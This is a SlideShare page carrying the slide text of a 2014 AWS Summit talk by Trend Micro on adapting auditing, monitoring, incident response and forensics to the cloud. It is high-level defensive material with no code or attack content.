© 2014 Amazon.com, Inc. and its affiliates. All rights reserved. May not be copied, modified, or distributed in whole or i...
G’Day Eh?
Strategy Tactics
Tactics
Tactics
Auditing
Monitoring
Incident Response
Forensic Investigations
Traditional Responsibility Model
Operating System
Application
Account Management
You
Facilities
Physical Security
Physical...
Shared Responsibility Model
You
Operating System
Application
Account Management
Security Groups
Network
Configuration
AWS
...
Before After
Structure
Bonus
Auditing
PCI Compliance
Requirements
Encrypting data at rest (3.4.1)
Address new threats & vulnerabilities (6.6)
Log external facing services & de...
Creating an audit trail, before
Servers
Storage Area Network
On-premises
Firewall
IPS
Central logging
Change
Records
Report
Payment
Client Data
On-premises AWS
Amazon CloudTrail
EC2 instances
Central management
Amazon S3
Amazon CloudFrontAmazon R...
Creating an audit trail, bonus points
You get
Record of changes via AWS CloudTrail
Security control reporting via Deep Sec...
In action…
Monitoring
Visibility
Requirements
Basic event info (5W+H)
Context of the event
Consistent identity across environments
Timely
Visibility, before
On-premises
FirewallIPS
Central logging SIEM
SwitchSwitchSwitchDirectory Server
AWS
Amazon CloudTrail
EC2 instances
Amazon S3 Bucket
Amazon CloudFrontAmazon RDS
Visibility, after
Central loggingSIEM
Ama...
Visibility, bonus points
You get
More work to put together events
Richer context around events
Why it matters
Visibility i...
In action…
Incident Response
Under pressure
SANS incident response process
Preparation
Identification
Containment
Eradication
Recovery
Lessons Learned
Get ready!
What...
Requirements
Quickly identify affected area
Minimize impact
Recovery quickly
Server
On-premises
Incident Response, before
Replacement
Analysis Report Improve
AWS
Incident Response, after
Instance
Analysis Report Improve
Replacement
Incident Response, bonus points
You get
Faster return to production
More time for analysis
Why it matters
Every minute of ...
In action…
Instance Analysis Report
Analyst
Optimized Response
LogProcessorAPI Improve
Replacement
Forensic Investigations
Rinse & Repeat
Perception
Reality
Reality, visualized
Requirements
Repeatable
Account for & prove each step
Not get in the way of recovery
Heavily documented
Forensics, before
Server
On-premises
Logs Analysis Testimony
Copy
AWS
Forensics, after
Instance
Logs Analysis Testimony
Copy
Forensics, bonus points
You get
Faster analysis & lower costs
Ability to replicate entire environment
Why it matters
Legal...
In action…
Original
Concurrent
Analysis
Examiner
Commands Copy 1
Copy 2
Copy 0
Analysis
Keys
Auditing Monitoring IR Forensics
Thank you.
Justin Foster
justin_foster@trendmicro.com
@justin_foster
Care of: Mark Nunnikhoven @marknca
© 2014 Amazon.com, Inc. and its affiliates. All rights reserved. May not be copied, modified, or distributed in whole or i...
AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro
AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro
AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro
AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro
AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro
AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro
AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro
AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro
AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro
AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro
AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro
Upcoming SlideShare
Loading in …5
×

AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro

990 views
865 views

Published on

This session is recommended for technical users who want to know how the day-to-day work of securing their on-premise workloads should changes when moving to the cloud. Learn how to increase the effectiveness of your security operations as you move to the cloud. We will discuss how your current incident response, forensic investigations, monitoring, and audit response tactics have to change in the cloud. Pulling from experiences helping clients move to the cloud, industry research, and the school of hard knocks, this talk will help provide practical advice you can apply today.

Published in: Technology, Business
0 Comments
4 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
990
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
0
Likes
4
Embeds 0
No embeds

No notes for slide

AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro

  1. 1. © 2014 Amazon.com, Inc. and its affiliates. All rights reserved. May not be copied, modified, or distributed in whole or in part without the express consent of Amazon.com, Inc. Updating Security Operations For The Cloud Justin Foster Senior Product Manager, Cloud & Data Center Security Trend Micro
  2. 2. G’Day Eh?
  3. 3. Strategy Tactics
  4. 4. Tactics
  5. 5. Tactics Auditing Monitoring Incident Response Forensic Investigations
  6. 6. Traditional Responsibility Model Operating System Application Account Management You Facilities Physical Security Physical Infrastructure Network Infrastructure Virtualization Infrastructure
  7. 7. Shared Responsibility Model You Operating System Application Account Management Security Groups Network Configuration AWS Facilities Physical Security Physical Infrastructure Network Infrastructure Virtualization Infrastructure
  8. 8. Before After Structure Bonus
  9. 9. Auditing
  10. 10. PCI Compliance
  11. 11. Requirements Encrypting data at rest (3.4.1) Address new threats & vulnerabilities (6.6) Log external facing services & defences (10.2, 10.5.4) Protect systems against malware (5.1) * PCI has many, many more requirements, this is just a sample
  12. 12. Creating an audit trail, before Servers Storage Area Network On-premises Firewall IPS Central logging Change Records Report
  13. 13. Payment Client Data On-premises AWS Amazon CloudTrail EC2 instances Central management Amazon S3 Amazon CloudFrontAmazon RDS Creating an audit trail, after Report
  14. 14. Creating an audit trail, bonus points You get Record of changes via AWS CloudTrail Security control reporting via Deep Security’s API Why it matters Regular assurance controls are in place
  15. 15. In action…
  16. 16. Monitoring
  17. 17. Visibility
  18. 18. Requirements Basic event info (5W+H) Context of the event Consistent identity across environments Timely
  19. 19. Visibility, before On-premises FirewallIPS Central logging SIEM SwitchSwitchSwitchDirectory Server
  20. 20. AWS Amazon CloudTrail EC2 instances Amazon S3 Bucket Amazon CloudFrontAmazon RDS Visibility, after Central loggingSIEM Amazon S3
  21. 21. Visibility, bonus points You get More work to put together events Richer context around events Why it matters Visibility is key to your security practice
  22. 22. In action…
  23. 23. Incident Response
  24. 24. Under pressure
  25. 25. SANS incident response process Preparation Identification Containment Eradication Recovery Lessons Learned Get ready! What is it? Did we get it? Is it gone? Again? Get better, fast!
  26. 26. Requirements Quickly identify affected area Minimize impact Recovery quickly
  27. 27. Server On-premises Incident Response, before Replacement Analysis Report Improve
  28. 28. AWS Incident Response, after Instance Analysis Report Improve Replacement
  29. 29. Incident Response, bonus points You get Faster return to production More time for analysis Why it matters Every minute of downtime counts
  30. 30. In action…
  31. 31. Instance Analysis Report Analyst Optimized Response LogProcessorAPI Improve Replacement
  32. 32. Forensic Investigations
  33. 33. Rinse & Repeat
  34. 34. Perception
  35. 35. Reality
  36. 36. Reality, visualized
  37. 37. Requirements Repeatable Account for & prove each step Not get in the way of recovery Heavily documented
  38. 38. Forensics, before Server On-premises Logs Analysis Testimony Copy
  39. 39. AWS Forensics, after Instance Logs Analysis Testimony Copy
  40. 40. Forensics, bonus points You get Faster analysis & lower costs Ability to replicate entire environment Why it matters Legal requirements Better defences
  41. 41. In action…
  42. 42. Original Concurrent Analysis Examiner Commands Copy 1 Copy 2 Copy 0 Analysis
  43. 43. Keys
  44. 44. Auditing Monitoring IR Forensics
  45. 45. Thank you. Justin Foster justin_foster@trendmicro.com @justin_foster Care of: Mark Nunnikhoven @marknca
  46. 46. © 2014 Amazon.com, Inc. and its affiliates. All rights reserved. May not be copied, modified, or distributed in whole or in part without the express consent of Amazon.com, Inc.

×